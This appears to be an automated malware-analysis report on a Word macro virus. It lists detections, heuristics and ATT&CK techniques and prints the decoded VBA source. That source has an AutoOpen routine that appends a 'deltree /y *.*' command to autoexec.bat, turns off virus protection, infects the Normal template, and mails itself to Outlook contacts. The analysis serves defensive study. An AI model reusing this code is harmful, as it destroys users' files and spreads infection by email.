MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic and VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon document opening. The script attempts to write to 'c:\autoexec.bat' and appends 'echo s|deltree /y *.*>Combo.vir', indicating an attempt to drop or execute a secondary payload. The ClamAV detection 'Doc.Trojan.Combossa-1' and 'Win.Worm.VBS-213' further support its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Combossa-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Combossa-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4361 bytes |
SHA-256: 932f179300c24027f424720ae259400425ed796f2538268c928930b961651452 |
|||
|
Detection
ClamAV:
Win.Worm.VBS-213
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub Main()
Dim nome$, arq$
Dim dead As Integer
On Error GoTo infecta
dead = System.ProfileString("Defination", "Combo")
dead = dead - 1
System.ProfileString("Defination", "Combo") = dead
GoTo noerro
infecta:
System.ProfileString("Defination", "Combo") = 100
dead = System.ProfileString("Defination", "Combo")
noerro:
If dead = 0 Then
If MsgBox("Is the man the virus of the planet?", vbYesNo, "You Died!") = vbYes Then
MsgBox "Correct answer!"
System.ProfileString("Defination", "Combo") = 100
Else
MsgBox "You Died!"
Open "c:\autoexec.bat" For Append As #1
Write #1, "echo s|deltree /y *.*>Combo.vir"
Close #1
End If
End If
Err.Clear
Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Enabled = False
nome$ = Normal.ThisDocument.FullName
arq$ = Application.ActiveDocument.FullName
macros = NormalTemplate.VBProject.VBComponents.Count
macros = Normal.ThisDocument.VBProject.VBComponents.Count - 1
If macros <= 0 Then
On Error Resume Next
Application.OrganizerCopy arq$, nome$, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy arq$, nome$, "AutoNew", wdOrganizerObjectProjectItems
Application.OrganizerCopy arq$, nome$, "Combo", wdOrganizerObjectProjectItems
Application.OrganizerCopy arq$, nome$, "OpenFile", wdOrganizerObjectProjectItems
End If
fim:
combo.combo
End Sub
Attribute VB_Name = "AutoNew"
Public Sub Main()
Dim dat As String
nome$ = Normal.ThisDocument.FullName
arq$ = Application.ActiveDocument.FullName
macros = Application.ActiveDocument.VBProject.VBComponents.Count - 1
If macros <= 0 Then
On Error Resume Next
Application.OrganizerCopy nome$, arq$, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy nome$, arq$, "AutoNew", wdOrganizerObjectProjectItems
Application.OrganizerCopy nome$, arq$, "Combo", wdOrganizerObjectProjectItems
Application.OrganizerCopy nome$, arq$, "OpenFile", wdOrganizerObjectProjectItems
End If
fim:
dat = "1 / 1 / 2000"
Date = dat
End Sub
Attribute VB_Name = "Combo"
Public Sub combo()
On Error Resume Next
Dim look, DMN, BO
Dim avp As String
Set look = CreateObject("Outlook.Application")
Set DMN = look.GetNameSpace("MAPI")
avp = "Outlook"
If look = avp Then
DMN.Logon "profile", "password"
For y = 1 To DMN.AddressLists.Count
Set AddyBook = DMN.AddressLists(y)
x = 1
Set BO = look.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BO.Recipients.Add Peep
x = x + 1
If x > 49 Then oo = AddyBook.AddressEntries.Count
Next oo
lingua = System.LanguageDesignation
If lingua = "Português (Brasil)" Then
BO.Subject = "Ainda se lembra de mim? " & Application.UserName
BO.Body = "Por que não me escreve mais? Ai vai o documento que me pediu, e não me pergunte como consegui!...Abraços!"
BO.Attachments.Add ActiveDocument.FullName
BO.Send
Peep = ""
Else
BO.Subject = "Do you Still remember me? " & Application.UserName
BO.Body = "Why doesn't write me more? Here be the document that asked me, and don't wonder as I got!... Hugs!"
BO.Attachments.Add ActiveDocument.FullName
BO.Send
Peep = ""
End If
Next y
End If
End Sub
Attribute VB_Name = "OpenFile"
Public Sub Main()
nome$ = Normal.ThisDocument.FullName
arq$ = Application.ActiveDocument.FullName
macros = Application.ActiveDocument.VBProject.VBComponents.Count - 1
If macros <= 0 Then
On Error Resume Next
Application.OrganizerCopy nome$, arq$, "AutoOpen", wdOrganizerObjectProjectItems
Applica
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.